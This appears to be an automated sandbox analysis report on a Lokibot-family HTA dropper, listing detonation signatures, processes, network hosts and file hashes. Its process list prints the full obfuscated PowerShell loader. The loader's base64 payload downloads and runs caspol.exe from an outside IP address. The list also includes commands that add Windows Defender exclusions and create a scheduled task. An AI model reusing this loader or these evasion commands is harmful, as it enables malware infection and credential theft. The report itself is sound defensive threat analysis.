Analysis Overview
SHA256
a786cb2ae0dc8117e3bfc07bca8bb0e5d4545ab8f5b4aa042c9ee85dca7b43a0
Threat Level: Known bad
The file a786cb2ae0dc8117e3bfc07bca8bb0e5d4545ab8f5b4aa042c9ee85dca7b43a0.hta was found to be: Known bad.
Malicious Activity Summary
Lokibot family
Lokibot
Evasion via Device Credential Deployment
Blocklisted process makes network request
Downloads MZ/PE file
Command and Scripting Interpreter: PowerShell
Reads user/profile data of web browsers
Executes dropped EXE
Checks computer location settings
Loads dropped DLL
Accesses Microsoft Outlook profiles
Suspicious use of SetThreadContext
Enumerates physical storage devices
System Location Discovery: System Language Discovery
outlook_win_path
Modifies Internet Explorer settings
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
Suspicious use of WriteProcessMemory
Scheduled Task/Job: Scheduled Task
outlook_office_path
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-11-21 07:35
Signatures
Analysis: behavioral2
Detonation Overview
Submitted
2024-11-21 07:35
Reported
2024-11-21 07:38
Platform
win10v2004-20241007-en
Max time kernel
38s
Max time network
144s
Command Line
Signatures
Lokibot
Lokibot family
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | C:\Windows\SysWOW64\wInDOwSPOweRsheLl\v1.0\pOweRShelL.EXe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Downloads MZ/PE file
Evasion via Device Credential Deployment
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | C:\Windows\SysWOW64\wInDOwSPOweRsheLl\v1.0\pOweRShelL.EXe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| Key value queried | \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Roaming\caspol.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\Control Panel\International\Geo\Nation | C:\Windows\SysWOW64\mshta.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\caspol.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\caspol.exe | N/A |
Reads user/profile data of web browsers
Accesses Microsoft Outlook profiles
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| Key opened | \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook | C:\Users\Admin\AppData\Roaming\caspol.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook | C:\Users\Admin\AppData\Roaming\caspol.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook | C:\Users\Admin\AppData\Roaming\caspol.exe | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| PID 4724 set thread context of 904 | N/A | C:\Users\Admin\AppData\Roaming\caspol.exe | C:\Users\Admin\AppData\Roaming\caspol.exe |
Enumerates physical storage devices
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\schtasks.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\wInDOwSPOweRsheLl\v1.0\pOweRShelL.EXe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Roaming\caspol.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\mshta.exe | N/A |
Scheduled Task/Job: Scheduled Task
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | C:\Windows\SysWOW64\wInDOwSPOweRsheLl\v1.0\pOweRShelL.EXe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\wInDOwSPOweRsheLl\v1.0\pOweRShelL.EXe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\caspol.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\caspol.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\wInDOwSPOweRsheLl\v1.0\pOweRShelL.EXe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Roaming\caspol.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of WriteProcessMemory
outlook_office_path
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| Key opened | \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook | C:\Users\Admin\AppData\Roaming\caspol.exe | N/A |
outlook_win_path
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| Key opened | \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook | C:\Users\Admin\AppData\Roaming\caspol.exe | N/A |
Processes
C:\Windows\SysWOW64\mshta.exe
C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\a786cb2ae0dc8117e3bfc07bca8bb0e5d4545ab8f5b4aa042c9ee85dca7b43a0.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
C:\Windows\SysWOW64\wInDOwSPOweRsheLl\v1.0\pOweRShelL.EXe
"C:\Windows\sYStem32\wInDOwSPOweRsheLl\v1.0\pOweRShelL.EXe" "PoWeRSheLL.ExE -EX bYpAss -nOP -W 1 -c DeViCecReDenTIaldEpLOyment ; iEx($(iEX('[SysteM.TExT.encODInG]'+[cHAR]58+[cHAR]58+'UTF8.GEtSTrINg([sysTem.cOnVERT]'+[cHAR]58+[chAr]58+'FrOMbASe64StrIng('+[chAR]34+'JG56dWNGVUF3ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFEZC10WVBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1lbWJlUkRFRklOaVRpT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidXJsbU9OIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgWlBudFZzUmhBaCxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBNeWpwcUlrUXdEYixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB1alFRcFNYb0lXeSx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgTSxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhWXlwdmx5a3BlKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BbUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiZFhHTSIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbmFNRVNwYUNlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgV1BmVyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkbnp1Y0ZVQXc6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xOTIuMy4yNDMuMTM2LzU1L2Nhc3BvbC5leGUiLCIkZU52OkFQUERBVEFcY2FzcG9sLmV4ZSIsMCwwKTtzVGFyVC1TbGVlUCgzKTtpZXggICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJEVOVjpBUFBEQVRBXGNhc3BvbC5leGUi'+[cHaR]0X22+'))')))"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EX bYpAss -nOP -W 1 -c DeViCecReDenTIaldEpLOyment
C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\fqh3jphh\fqh3jphh.cmdline"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESC2A4.tmp" "c:\Users\Admin\AppData\Local\Temp\fqh3jphh\CSCBF6C05B6915448E28F66191B9F6A879C.TMP"
C:\Users\Admin\AppData\Roaming\caspol.exe
"C:\Users\Admin\AppData\Roaming\caspol.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\caspol.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\rrwscqkDSNwLK.exe"
C:\Windows\SysWOW64\schtasks.exe
"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\rrwscqkDSNwLK" /XML "C:\Users\Admin\AppData\Local\Temp\tmp343A.tmp"
C:\Users\Admin\AppData\Roaming\caspol.exe
"C:\Users\Admin\AppData\Roaming\caspol.exe"
Network
| Country | Destination | Domain | Proto |
| --- | --- | --- | --- |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 13.86.106.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 22.160.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 209.205.72.20.in-addr.arpa | udp |
| US | 192.3.243.136:80 | 192.3.243.136 | tcp |
| US | 8.8.8.8:53 | 136.243.3.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 196.249.167.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 197.87.175.4.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 18.31.95.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.214.232.199.in-addr.arpa | udp |
| DE | 94.156.177.41:80 | 94.156.177.41 | tcp |
| US | 8.8.8.8:53 | 41.177.156.94.in-addr.arpa | udp |
| DE | 94.156.177.41:80 | 94.156.177.41 | tcp |
| DE | 94.156.177.41:80 | 94.156.177.41 | tcp |
| US | 8.8.8.8:53 | 81.144.22.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 21.236.111.52.in-addr.arpa | udp |
| DE | 94.156.177.41:80 | 94.156.177.41 | tcp |
Files
memory/2764-0-0x000000007119E000-0x000000007119F000-memory.dmp
memory/2764-1-0x00000000025F0000-0x0000000002626000-memory.dmp
memory/2764-3-0x0000000071190000-0x0000000071940000-memory.dmp
memory/2764-2-0x0000000005120000-0x0000000005748000-memory.dmp
memory/2764-4-0x0000000071190000-0x0000000071940000-memory.dmp
memory/2764-5-0x00000000050A0000-0x00000000050C2000-memory.dmp
memory/2764-7-0x0000000005870000-0x00000000058D6000-memory.dmp
memory/2764-6-0x0000000005800000-0x0000000005866000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_kxcfel11.13o.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/2764-17-0x00000000059E0000-0x0000000005D34000-memory.dmp
memory/2764-18-0x0000000005EE0000-0x0000000005EFE000-memory.dmp
memory/2764-19-0x0000000005F90000-0x0000000005FDC000-memory.dmp
memory/2640-29-0x00000000073A0000-0x00000000073D2000-memory.dmp
memory/2640-30-0x000000006DA50000-0x000000006DA9C000-memory.dmp
memory/2640-40-0x0000000007380000-0x000000000739E000-memory.dmp
memory/2640-41-0x00000000073F0000-0x0000000007493000-memory.dmp
memory/2640-42-0x0000000007B70000-0x00000000081EA000-memory.dmp
memory/2640-43-0x0000000007520000-0x000000000753A000-memory.dmp
memory/2640-44-0x0000000007580000-0x000000000758A000-memory.dmp
memory/2640-45-0x00000000077B0000-0x0000000007846000-memory.dmp
memory/2640-46-0x0000000007720000-0x0000000007731000-memory.dmp
memory/2640-47-0x0000000007750000-0x000000000775E000-memory.dmp
memory/2640-48-0x0000000007760000-0x0000000007774000-memory.dmp
memory/2640-49-0x0000000007870000-0x000000000788A000-memory.dmp
memory/2640-50-0x00000000077A0000-0x00000000077A8000-memory.dmp
\??\c:\Users\Admin\AppData\Local\Temp\fqh3jphh\fqh3jphh.cmdline
| MD5 | 398a9341ef888048c2256e68b5d90427 |
| SHA1 | 7384a1d094a0515737408fab45c9511f5be82ea1 |
| SHA256 | ed7ccb2559c691dca3653465f397a16f66b371689820b263f6ad830cbd11e8cc |
| SHA512 | 806e01a9efafe92d9267dec26d8c44a8c2c6aded26e8cccaedbc0dad322db55ccd02e3d7b3923e488b0c25b72168cc31ddf7c5d50a7924c705b8e9be62cca377 |
\??\c:\Users\Admin\AppData\Local\Temp\fqh3jphh\fqh3jphh.0.cs
| MD5 | fe82050659a8b97690d60529499222c1 |
| SHA1 | 7cc50135852b46dd1e36f2ff98506613db525a68 |
| SHA256 | 64c38563c4588b718b03aec685677f173456d3c961ef97cd95e7784ee1e51a6a |
| SHA512 | 59356fd5cbb38a06bf09e182b8ed7c7c2200e6f8de8e950be38bee0c45aa96b2dbf202bdc56097a74acc4e0a8bc601558e83c098a376630cfa1bcce64133d64f |
\??\c:\Users\Admin\AppData\Local\Temp\fqh3jphh\CSCBF6C05B6915448E28F66191B9F6A879C.TMP
| MD5 | 78057cdba99e48d2a36a65e34ccb752e |
| SHA1 | 309542f3a0fb421734838098e41c77d16ddaa683 |
| SHA256 | 014c2d366cd42a7740e7a573ce361bb9e0e2e3fe2e73579ee02411216079e9a5 |
| SHA512 | ac4271b3ebfe9b61202e2b08446c42f4850541cb7e9f44601587ddb94455ac1cf0b8fa7e85aa81b836530ffabff788eaa217b8700841f99743e3b6a133f4076b |
C:\Users\Admin\AppData\Local\Temp\RESC2A4.tmp
| MD5 | f200ef92016b45489bbd235ba63f71a5 |
| SHA1 | 9ae2ab3e4567df9dac68046856d9a1378dd72557 |
| SHA256 | 4765bb4f074b80fc37d18c430c073c5931d6a85f3ba2b09c6001375916b830ef |
| SHA512 | 3f61853742dea30e1bd5b1552e00feea8a44ca266d0773a5ec8e7ab1c684ada105e496400977cd39f84f2ebfc461f7b958263037a39c30641ea952c7d5a0b80d |
C:\Users\Admin\AppData\Local\Temp\fqh3jphh\fqh3jphh.dll
| MD5 | d8ed4e58a37e9303aec70f150a049565 |
| SHA1 | 810460053f97d0e42c00b4d8c0651bb9150556e0 |
| SHA256 | 13544ebaea46b47daef3682d90c40f48f8f6be12bde9875a1c1edadfd3a62676 |
| SHA512 | 41acd4a6c2c560dcb1cf73e7fd4d87dc9ed14f2fa6169e98d2ab483495aca3d5ed995dac4d7640bad2d5ffc7cb63a64bf34a61b9fc194b6bfdfcf2a54fedadcc |
memory/2764-65-0x0000000006490000-0x0000000006498000-memory.dmp
memory/2764-71-0x000000007119E000-0x000000007119F000-memory.dmp
memory/2764-72-0x0000000071190000-0x0000000071940000-memory.dmp
memory/2764-73-0x0000000071190000-0x0000000071940000-memory.dmp
C:\Users\Admin\AppData\Roaming\caspol.exe
| MD5 | 74061922f1e78c237a66d12a15a18181 |
| SHA1 | e31ee444aaa552a100f006e43f0810497a3b0387 |
| SHA256 | 89bf888148eae2caabdc6d3fff98054127b197b402493581894a3104ed6b6f1c |
| SHA512 | 306744107d78b02ecfd28252dae954f0b47c1f761e15a33c937474a2e15284c17bb7e2542618b745ea5f95e5a7dba3d27b675c8837914a44d8b5b350a3d4a136 |
memory/4724-82-0x0000000000430000-0x00000000004C8000-memory.dmp
memory/4724-84-0x00000000052E0000-0x0000000005884000-memory.dmp
memory/4724-85-0x0000000004DD0000-0x0000000004E62000-memory.dmp
memory/4724-86-0x0000000004D90000-0x0000000004D9A000-memory.dmp
memory/4724-87-0x0000000005080000-0x000000000511C000-memory.dmp
memory/2764-83-0x0000000071190000-0x0000000071940000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\pOweRShelL.EXe.log
| MD5 | 968cb9309758126772781b83adb8a28f |
| SHA1 | 8da30e71accf186b2ba11da1797cf67f8f78b47c |
| SHA256 | 92099c10776bb7e3f2a8d1b82d4d40d0c4627e4f1bf754a6e58dfd2c2e97042a |
| SHA512 | 4bd50732f8af4d688d95999bddfd296115d7033ddc38f86c9fb1f47fde202bffa27e9088bebcaa3064ca946af2f5c1ca6cbde49d0907f0005c7ab42874515dd3 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | c07d4a9c3cab5bb865ebdd573a366558 |
| SHA1 | 50c0b6fa427d3672cb673ed0c9986d637cd059a8 |
| SHA256 | e4c875a5953bc9853f79cbbb5e7dbf8c678422b5c15232f85600d2610635b3f7 |
| SHA512 | 44fa77691d15f73d815ddbdbd831123f48a8a8b796de2b3942ac6560ff4cf6624de507800c9b9a7bbd990b48ca24edb4af54a09b0ece8051afe11e73a0ad36ec |
memory/4724-88-0x0000000004FC0000-0x0000000004FD2000-memory.dmp
memory/4724-89-0x0000000006740000-0x00000000067A4000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\tmp343A.tmp
| MD5 | d3259388c1295044ac9efaf15c965790 |
| SHA1 | d1b7dfd6424159d1e838f2e6f8ab217cdcf06d2b |
| SHA256 | 61b1bfad298759fc3534d796ecafcce4088086c498ae9aa7eb0537715d959090 |
| SHA512 | ec4955def3e77a72789979919808f67daae0ec32d77daf1184d7e6ef8417e6c0843ea484872ba69cdb1f3ad8e983e44f1b424f9896c613224acda0f5ff15aabc |
memory/904-116-0x0000000000400000-0x00000000004A2000-memory.dmp
memory/4828-119-0x00000000060F0000-0x000000000613C000-memory.dmp
memory/904-114-0x0000000000400000-0x00000000004A2000-memory.dmp
memory/4828-95-0x0000000005390000-0x00000000056E4000-memory.dmp
memory/3704-136-0x0000000007400000-0x00000000074A3000-memory.dmp
memory/4828-130-0x000000006DFE0000-0x000000006E02C000-memory.dmp
memory/3704-120-0x000000006DFE0000-0x000000006E02C000-memory.dmp
memory/3704-144-0x0000000007770000-0x0000000007781000-memory.dmp
memory/3704-145-0x00000000077B0000-0x00000000077C4000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 38202961910eba1dae31b0abea906f2c |
| SHA1 | 8a816445bd72cc54ebd0d0d028dec8877dd9184f |
| SHA256 | a409c21e7b7967dd8b9d6c851bb0a506367ec24f9c3bb2f380900e53f362e7e2 |
| SHA512 | bb25cf01e0dafbde499fa2ea1b4446443e07b5988fd601f617fc4d28aa090267e27b2193f12178fbd1dd2223412473463cba537f357d82effb611999bfe47257 |
C:\Users\Admin\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-2878641211-696417878-3864914810-1000\0f5007522459c86e95ffcc62f32308f1_4fc725d8-4f7d-4884-b878-08bb0ce6c800
| MD5 | d898504a722bff1524134c6ab6a5eaa5 |
| SHA1 | e0fdc90c2ca2a0219c99d2758e68c18875a3e11e |
| SHA256 | 878f32f76b159494f5a39f9321616c6068cdb82e88df89bcc739bbc1ea78e1f9 |
| SHA512 | 26a4398bffb0c0aef9a6ec53cd3367a2d0abf2f70097f711bbbf1e9e32fd9f1a72121691bb6a39eeb55d596edd527934e541b4defb3b1426b1d1a6429804dc61 |
memory/904-165-0x0000000000400000-0x00000000004A2000-memory.dmp
C:\Users\Admin\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-2878641211-696417878-3864914810-1000\0f5007522459c86e95ffcc62f32308f1_4fc725d8-4f7d-4884-b878-08bb0ce6c800
| MD5 | c07225d4e7d01d31042965f048728a0a |
| SHA1 | 69d70b340fd9f44c89adb9a2278df84faa9906b7 |
| SHA256 | 8c136c7ae08020ad16fd1928e36ad335ddef8b85906d66b712fff049aa57dc9a |
| SHA512 | 23d3cea738e1abf561320847c39dadc8b5794d7bd8761b0457956f827a17ad2556118b909a3e6929db79980ccf156a6f58ac823cf88329e62417d2807b34b64b |
memory/904-172-0x0000000000400000-0x00000000004A2000-memory.dmp
Analysis: behavioral1
Detonation Overview
Submitted
2024-11-21 07:35
Reported
2024-11-21 07:38
Platform
win7-20240903-en
Max time kernel
118s
Max time network
119s
Command Line
Signatures
Lokibot
Lokibot family
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | C:\Windows\SysWOW64\wInDOwSPOweRsheLl\v1.0\pOweRShelL.EXe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Downloads MZ/PE file
Evasion via Device Credential Deployment
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | C:\Windows\SysWOW64\wInDOwSPOweRsheLl\v1.0\pOweRShelL.EXe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\caspol.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\caspol.exe | N/A |
Loads dropped DLL
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | C:\Windows\SysWOW64\wInDOwSPOweRsheLl\v1.0\pOweRShelL.EXe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\wInDOwSPOweRsheLl\v1.0\pOweRShelL.EXe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\wInDOwSPOweRsheLl\v1.0\pOweRShelL.EXe | N/A |
Reads user/profile data of web browsers
Accesses Microsoft Outlook profiles
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| Key opened | \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook | C:\Users\Admin\AppData\Roaming\caspol.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook | C:\Users\Admin\AppData\Roaming\caspol.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook | C:\Users\Admin\AppData\Roaming\caspol.exe | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| PID 2640 set thread context of 2244 | N/A | C:\Users\Admin\AppData\Roaming\caspol.exe | C:\Users\Admin\AppData\Roaming\caspol.exe |
Enumerates physical storage devices
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\mshta.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\wInDOwSPOweRsheLl\v1.0\pOweRShelL.EXe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Roaming\caspol.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\schtasks.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe | N/A |
Modifies Internet Explorer settings
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| Key created | \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Internet Explorer\Main | C:\Windows\SysWOW64\mshta.exe | N/A |
Scheduled Task/Job: Scheduled Task
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | C:\Windows\SysWOW64\wInDOwSPOweRsheLl\v1.0\pOweRShelL.EXe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\caspol.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\caspol.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\wInDOwSPOweRsheLl\v1.0\pOweRShelL.EXe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
